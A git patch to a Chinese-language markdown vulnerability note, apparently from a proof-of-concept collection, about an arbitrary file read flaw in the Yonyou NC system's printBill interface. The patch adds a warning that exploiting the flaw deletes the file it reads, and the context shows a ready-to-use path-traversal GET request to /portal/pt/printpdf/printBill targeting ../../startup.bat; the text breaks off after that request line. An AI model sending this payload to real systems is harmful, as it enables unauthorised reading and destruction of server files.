From 43615adcb32c049d08cb79f13a95944e58378f37 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Thu, 16 May 2024 21:53:48 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E7=94=A8=E5=8F=8BNC=E7=B3=BB=E7=BB=9F?= =?UTF-8?q?printBill=E6=8E=A5=E5=8F=A3=E5=AD=98=E5=9C=A8=E4=BB=BB=E6=84=8F?= =?UTF-8?q?=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友NC系统printBill接口存在任意文件读取漏洞.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/用友NC系统printBill接口存在任意文件读取漏洞.md b/用友NC系统printBill接口存在任意文件读取漏洞.md index cbb9a88..4568fea 100644 --- a/用友NC系统printBill接口存在任意文件读取漏洞.md +++ b/用友NC系统printBill接口存在任意文件读取漏洞.md @@ -1,5 +1,7 @@ ## 用友NC系统printBill接口存在任意文件读取漏洞 +`注意:这个漏洞在读取文件的时候,会将原来的文件删除,谨慎使用。` + ## poc ``` GET /portal/pt/printpdf/printBill?pageId=login&filePath=../../startup.bat HTTP/1.1